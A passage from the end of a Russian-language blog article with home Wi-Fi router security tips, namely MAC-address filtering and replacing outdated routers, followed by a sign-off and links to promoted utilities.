  5. в настройках роутера разрешите подключение только устройствам с определенными MAC-адресами (не все роутеры поддерживают это);
  6. если у вас старая модель роутера, не поддерживающая какие-то новые стандарты безопасности: приобретите новое устройство.

*

За дополнения по теме – заранее мерси!

Всем удачи!

RSS  (как читать Rss)

Полезный софт:

  • -Монтаж
  • Отличное ПО для начала создания своих собственных видеороликов (все действия идут по шагам!).

    сделает даже новичок!

  • Ускоритель компьютера
  • Программа для очистки Windows от мусора (ускоряет систему, удаляет мусор, оптимизирует реестр).

Источник: https://ocomp.info/kak-skryit-set-wifi-routera.html

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.